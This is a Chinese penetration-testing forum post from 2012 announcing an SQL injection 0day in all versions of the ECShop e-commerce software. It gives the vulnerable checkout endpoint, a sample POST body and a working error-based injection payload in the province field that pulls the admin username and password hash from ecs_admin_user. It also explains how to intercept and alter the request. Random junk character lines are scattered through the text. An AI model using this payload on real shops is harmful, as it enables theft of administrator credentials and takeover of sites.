中国网络渗透测试联盟
标题:
ECShop全版本SQL注入0day
[打印本页]
作者:
admin
时间:
2012-12-31 09:19
标题:
ECShop全版本SQL注入0day
感谢欠杀的黑盒
& T* G: J% T" X+ L
& R3 N6 b4 x9 p' a, z/ z$ g! A. S
- G1 N' X8 F7 r! j4 ?
把任意商品加入购物车在填写配送地址那一页,有地区选择
n! ]. p4 G& c9 S
- a7 b9 j3 g3 O8 w, G
flow.php?step=consignee&direct_shopping=1
7 \8 X& l- l. b. i
比如省选择安徽
, I2 R4 i% y% l/ b( A1 ]/ \
4 k3 K' u8 q8 H9 B" }2 f
其中POST数据如下
) Z' }9 J% v1 o
. L: k ^0 S$ N" B& S: m; J
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
( w. T9 W9 w% T( Z0 M7 K- k7 q5 k
改成
r7 S6 Q c2 V- B0 A
7 j4 t& w/ e# b% s! v9 [+ i& g" m
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
! g5 S! w9 y: l/ z6 a
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
' l5 q0 O5 P! P
2 W( F$ `) _" B. f" K
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
3 u8 C, v, i- t' [5 X: b O
7 p4 b* |/ H- S3 Y ~
就会回显错误页面了。。。。
5 ^9 M4 V0 D5 d
4 e, z( a) {+ P+ v/ c5 u3 t0 y8 G$ ^
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
9 h/ U$ x# Y5 q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2